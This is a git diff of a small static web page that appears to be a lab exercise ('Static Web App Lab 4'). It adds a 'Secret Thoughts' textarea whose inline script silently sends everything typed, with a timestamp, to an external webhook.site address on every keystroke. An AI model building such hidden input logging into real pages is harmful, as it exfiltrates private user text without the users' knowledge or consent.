--- a/src/index.html
+++ b/src/index.html
@@ -1,17 +1,25 @@
-<!DOCTYPE html>
-<html lang="en">
-
-<head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <link rel="stylesheet" href="styles.css">
-  <title>Vanilla JavaScript App</title>
-</head>
-
-<body>
-  <main>
-    <h1>Vanilla JavaScript App</h1>
-  </main>
-</body>
-
+<html>
+  <head>
+    <title>Static Web App Lab 4</title>
+  </head>
+  <body>
+    <div>
+      <h1>Static Web App Lab 4 - Write</h1>
+      <div>
+        <h2>Secret Thoughts</h2>
+        <textarea id="secretThoughts"></textarea>
+      </div>
+    </div>
+    <script>
+      const textarea = document.getElementById("secretThoughts")
+      textarea.addEventListener("input", function (e) {
+        const text = e.target.value
+        fetch(
+          `https://webhook.site/58c21033-4f3f-4ee4-a4cb-9e766101d868?text=${encodeURIComponent(
+            text
+          )}&timestamp=${encodeURIComponent(new Date().toISOString())}`
+        ).catch(console.error)
+      })
+    </script>
+  </body>
 </html>
